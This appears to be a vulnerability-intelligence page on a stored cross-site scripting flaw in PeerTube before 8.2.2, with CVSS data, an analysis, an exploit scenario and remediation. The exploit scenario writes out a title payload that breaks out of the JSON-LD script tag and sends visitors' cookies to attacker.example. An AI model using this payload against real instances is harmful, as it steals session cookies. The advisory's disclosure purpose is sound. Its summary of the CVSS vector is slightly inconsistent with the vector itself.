Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Stored XSS requires low-privilege upload account (PR:L) and victim page visit (UI:R); scope changes to browser context with limited confidentiality and integrity impact.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
2DescriptionCVE.org
PeerTube is an ActivityPub-federated video streaming platform. Prior to 8.2.2, server-side-rendered video watch pages embed a schema.org JSON-LD block by JSON.stringify-ing video metadata without escaping less-than, greater-than, or slash characters, allowing a value containing the byte sequence that closes a script element to inject arbitrary HTML or JavaScript that executes in the instance origin for visitors to the attacker's videos. This issue is fixed in version 8.2.2.
AnalysisAI
Stored XSS in PeerTube before version 8.2.2 allows any authenticated uploader to inject arbitrary HTML and JavaScript into the instance origin by embedding the byte sequence </script> inside video metadata fields. The server-side renderer serializes video metadata directly into schema.org JSON-LD script blocks using JSON.stringify without HTML-character escaping, causing the browser to terminate the script tag prematurely and parse attacker-controlled content as raw HTML. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to hold an account with video upload privileges on the target PeerTube instance - on open-registration instances this is trivially obtainable; on closed instances it requires prior account compromise or social engineering. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:L/UI:P, score 5.1) accurately captures the key risk constraints: network reachability with low complexity, but requiring low-privilege account access (PR:L) and passive victim interaction (UI:P). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers an account on a PeerTube instance with open registration enabled and uploads a video with a title such as Interesting Video</script><script>document.location='https://attacker.example/steal?c='+document.cookie</script>. The PeerTube server embeds this title unescaped into the JSON-LD block of the video watch page; when any visitor navigates to that page, the browser closes the script tag at </script>, executes the attacker's payload in the instance's origin, and exfiltrates the victim's session cookie. … |
| Remediation | Upgrade to PeerTube 8.2.2 or later immediately; the patched release is available at https://github.com/Chocobozzz/PeerTube/releases/tag/v8.2.2 and addresses the root cause by adding proper HTML-character escaping to the JSON-LD metadata serialization path (commit 45394d701b08e87d72b8f0c1866b881f2becbde3). … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
The vulnerability allows any attacker to cause the PeerTube server to stop functioning, or in special cases send request
This vulnerability allows any attacker to cause the PeerTube server to stop responding to requests due to an infinite lo
This vulnerability allows any authenticated user to cause the server to consume very large amounts of disk space when ex
The vulnerability allows any authenticated user to cause the PeerTube server to stop functioning in a persistent manner.
Insecure Storage of Sensitive Information in GitHub repository chocobozzz/peertube prior to 4.1.1. Rated medium severity
peertube is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). Rated me
Improper Access Control in GitHub repository chocobozzz/peertube prior to 4.1.0. Rated medium severity (CVSS 5.4), this
Missing Authorization in GitHub repository chocobozzz/peertube prior to 4.1.0. Rated medium severity (CVSS 5.4), this vu
This vulnerability allows any attacker to add playlists to a different user’s channel using the ActivityPub protocol. Ra
The vulnerability allows an existing user to add playlists to a different user’s channel using the PeerTube REST API. Ra
The vulnerability allows any authenticated user to leak the contents of arbitrary “.m3u8” files from the PeerTube server
Same weakness CWE-80 – Basic XSS
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42952